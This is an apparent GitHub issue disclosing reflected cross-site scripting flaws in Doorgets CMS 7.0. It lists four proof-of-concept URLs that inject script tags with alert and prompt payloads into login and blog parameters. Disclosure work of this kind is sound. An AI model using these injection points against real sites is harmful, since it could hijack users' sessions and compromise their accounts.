Skip to content

Reflected / Non-Persistant Cross-Site Scripting #4

@seceir

Description

@seceir

The Doorgets CMS 7.0 application was found to be vulnerable to reflected or non-persistent cross-site scripting. The presence of cross-site scripting is due to weak input validation and successful exploitation may lead to user account compromise. An attacker can effectively force users to execute malicious payloads or trick them into clicking links which may allow their sessions to be hijacked.

Multiple instances of XSS were identified:

  1. http://localhost:8081/do/dg-user/?controller=authentification&error-login=true&back=/do/dg-user/%3Fcontroller%3Dinbox%26q_uri_module%3Dcontact"><script>alert('xss')</script>

xss1

  1. http://localhost:8081/do/dg-user/?action=forget"><script>alert('xss in action')</script>&controller=authentification

  2. http://localhost:8081/do/u/doorgets/?blog&apples"><Script>alert("XSS")</Script>pears

xss2

  1. http://localhost:8081/do/dg-user/?back="><script>prompt(966953)</script>&controller=authentification

Vendor is aware and working on a fix.

Safe Surfing :)

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions